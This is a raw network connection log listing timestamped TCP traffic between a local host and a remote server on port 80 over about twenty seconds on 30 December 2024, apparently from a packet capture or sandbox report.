Dec 30, 2024 01:58:22.755924940 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.756098032 CET	49922	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.760890961 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.760930061 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.761048079 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.761055946 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.761117935 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.761126041 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.761176109 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.761184931 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.761208057 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.761215925 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.761257887 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.761317968 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.761327028 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.761367083 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.761374950 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.761414051 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.761421919 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.761446953 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.761455059 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.761503935 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.761543036 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.761552095 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.761559963 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.761601925 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.761610985 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.815711975 CET	80	49921	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.815921068 CET	80	49921	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.815931082 CET	80	49921	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.816029072 CET	49921	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.828799009 CET	80	49920	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.829364061 CET	80	49920	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.829397917 CET	80	49920	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.829408884 CET	80	49920	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.829423904 CET	49920	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.829453945 CET	49920	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.832376957 CET	49922	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.837302923 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.837388992 CET	49922	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.900146008 CET	80	49921	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.900158882 CET	80	49921	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.900202990 CET	49921	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:26.710664034 CET	49921	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:26.711596012 CET	49952	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:26.711801052 CET	49920	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:26.715023994 CET	49953	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:26.715676069 CET	80	49921	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:26.716022968 CET	49921	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:26.716425896 CET	80	49952	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:26.716733932 CET	80	49920	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:26.716862917 CET	49952	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:26.716864109 CET	49920	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:26.716959000 CET	49952	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:26.719882965 CET	80	49953	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:26.720309019 CET	49953	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:26.720362902 CET	49953	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:26.721708059 CET	80	49952	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:26.725156069 CET	80	49953	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:26.848396063 CET	49953	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:26.848396063 CET	49955	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:26.848397970 CET	49952	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:26.853269100 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:26.853657961 CET	49955	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:26.853657961 CET	49955	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:26.858460903 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:26.896903038 CET	80	49953	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:26.896915913 CET	80	49952	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.117686033 CET	80	49953	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.117734909 CET	49953	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:27.122838974 CET	80	49952	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.122884035 CET	49952	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:27.209742069 CET	49955	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:27.214574099 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.214586973 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.214622021 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.214631081 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.214657068 CET	49955	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:27.214665890 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.214674950 CET	49955	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:27.214677095 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.214688063 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.214709044 CET	49955	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:27.214730024 CET	49955	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:27.214842081 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.214852095 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.214859962 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.214900017 CET	49955	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:27.219522953 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.219535112 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.219562054 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.219568014 CET	49955	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:27.219571114 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.219590902 CET	49955	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:27.219616890 CET	49955	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:27.219690084 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.219702005 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.219733953 CET	49955	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:27.219750881 CET	49955	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:27.250518084 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.250685930 CET	49955	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:27.255582094 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.255629063 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.255637884 CET	49955	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:27.255667925 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.255685091 CET	49955	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:27.255686998 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.255733967 CET	49955	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:27.255767107 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.255783081 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.255791903 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.255814075 CET	49955	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:27.255827904 CET	49955	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:27.255855083 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.255898952 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.255908012 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.255916119 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.255932093 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.255939960 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.255975008 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.255984068 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.256021976 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.256031036 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.256089926 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.256098986 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.256130934 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.256139994 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.256190062 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.256200075 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.256217003 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.256226063 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.256238937 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.256290913 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.256299019 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.260386944 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.260462999 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.260471106 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.260562897 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.260571957 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.260591030 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.260598898 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.260615110 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.260624886 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.260684013 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.260699987 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.260715961 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.260725021 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.260799885 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.260807991 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.260843039 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.260852098 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.260921955 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.260931969 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.260962963 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.260971069 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.261018038 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.261029005 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.261065006 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.261073112 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.394285917 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.394299984 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.394310951 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.394344091 CET	49955	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:27.394525051 CET	49955	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:27.395163059 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:27.395207882 CET	49955	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:27.399328947 CET	80	49955	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:29.320276022 CET	49972	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:29.320878983 CET	49973	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:29.325160027 CET	80	49972	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:29.325228930 CET	49972	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:29.325347900 CET	49972	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:29.325613976 CET	80	49973	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:29.325680971 CET	49973	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:29.325752974 CET	49973	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:29.330168962 CET	80	49972	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:29.330507040 CET	80	49973	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:29.678186893 CET	49973	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:29.678195953 CET	49972	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:29.683125019 CET	80	49973	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:29.683168888 CET	80	49972	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:29.869223118 CET	80	49972	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:29.869410992 CET	80	49972	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:29.869447947 CET	80	49972	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:29.869471073 CET	49972	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:29.869483948 CET	80	49972	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:29.869538069 CET	49972	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:29.877322912 CET	80	49973	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:29.877562046 CET	80	49973	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:29.877577066 CET	80	49973	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:29.877592087 CET	80	49973	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:29.877609015 CET	49973	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:29.877626896 CET	49973	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:29.877801895 CET	49973	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:29.882605076 CET	80	49973	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:30.028670073 CET	80	49973	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:30.028892040 CET	80	49973	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:30.028901100 CET	80	49973	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:30.028912067 CET	80	49973	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:30.028923035 CET	80	49973	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:30.028951883 CET	49973	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:30.029052973 CET	49973	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:30.029376984 CET	80	49973	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:30.029501915 CET	49973	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:30.033752918 CET	80	49973	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:30.033762932 CET	80	49973	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:30.033811092 CET	80	49973	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:30.033818960 CET	80	49973	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:30.033866882 CET	80	49973	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:30.033874989 CET	80	49973	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:30.033885002 CET	80	49973	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:30.033974886 CET	80	49973	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:30.033983946 CET	80	49973	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:30.034018040 CET	80	49973	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:30.034025908 CET	80	49973	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:30.034291983 CET	80	49973	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:33.178894997 CET	49972	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:33.179815054 CET	50001	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:33.180237055 CET	50002	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:33.183891058 CET	80	49972	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:33.183974981 CET	49972	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:33.184670925 CET	80	50001	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:33.184772968 CET	50001	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:33.184885025 CET	50001	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:33.185045958 CET	80	50002	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:33.185112000 CET	50002	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:33.185197115 CET	50002	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:33.189687967 CET	80	50001	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:33.189995050 CET	80	50002	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:33.537533045 CET	50002	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:33.537621975 CET	50001	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:33.542387009 CET	80	50002	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:33.542480946 CET	80	50001	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:33.725634098 CET	80	50002	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:33.725905895 CET	80	50002	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:33.725917101 CET	80	50002	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:33.725928068 CET	80	50002	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:33.725950956 CET	50002	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:33.725994110 CET	50002	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:33.765522957 CET	80	50001	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:33.765763044 CET	80	50001	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:33.765774012 CET	80	50001	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:33.765784979 CET	80	50001	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:33.765815973 CET	50001	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:33.765851974 CET	50001	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:33.766588926 CET	50001	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:33.771411896 CET	80	50001	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:33.927474976 CET	80	50001	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:33.927490950 CET	80	50001	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:33.927498102 CET	80	50001	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:33.927504063 CET	80	50001	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:33.935018063 CET	50001	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:34.758723974 CET	50002	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:34.759844065 CET	50013	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:34.763761997 CET	80	50002	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:34.763880968 CET	50002	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:34.764636993 CET	80	50013	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:34.764729977 CET	50013	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:34.764889002 CET	50013	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:34.769712925 CET	80	50013	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:35.115585089 CET	50013	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:35.120337009 CET	80	50013	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:35.305811882 CET	80	50013	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:35.305907011 CET	80	50013	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:35.305918932 CET	80	50013	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:35.305934906 CET	80	50013	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:35.305946112 CET	50013	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:35.305970907 CET	50013	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:36.666830063 CET	50013	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:36.670381069 CET	50023	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:36.671968937 CET	80	50013	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:36.675060034 CET	50013	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:36.675266981 CET	80	50023	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:36.675534964 CET	50023	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:36.675534964 CET	50023	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:36.680361986 CET	80	50023	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:37.045007944 CET	50023	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:37.049995899 CET	80	50023	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:37.236609936 CET	80	50023	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:37.236629963 CET	80	50023	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:37.236644983 CET	80	50023	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:37.236686945 CET	50023	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:37.241839886 CET	50023	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:37.246628046 CET	80	50023	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:37.394548893 CET	80	50023	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:37.394705057 CET	80	50023	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:37.394721031 CET	80	50023	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:37.394735098 CET	80	50023	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:37.394781113 CET	50023	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:37.394781113 CET	50023	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:37.395106077 CET	80	50023	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:37.395169973 CET	50023	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.123388052 CET	49743	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.124434948 CET	50024	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.128366947 CET	80	49743	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.129236937 CET	80	50024	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.129343033 CET	50024	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.129559040 CET	50024	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.134294033 CET	80	50024	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.250997066 CET	50025	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.255918026 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.255994081 CET	50025	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.256341934 CET	50025	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.261178017 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.475423098 CET	50024	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.480360031 CET	80	50024	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.615740061 CET	50025	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.620595932 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.620614052 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.620628119 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.620656013 CET	50025	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.620671034 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.620682955 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.620683908 CET	50025	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.620721102 CET	50025	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.620846033 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.620857954 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.620907068 CET	50025	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.620949984 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.620961905 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.621000051 CET	50025	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.621010065 CET	50025	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.621031046 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.621071100 CET	50025	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.625514030 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.625525951 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.625569105 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.625574112 CET	50025	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.625581026 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.625605106 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.625616074 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.625638008 CET	50025	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.625673056 CET	50025	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.653517962 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.653637886 CET	50025	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.658490896 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.658536911 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.658548117 CET	50025	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.658570051 CET	50025	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.658581018 CET	80	50025	156.67.74.96	192.168.2.4
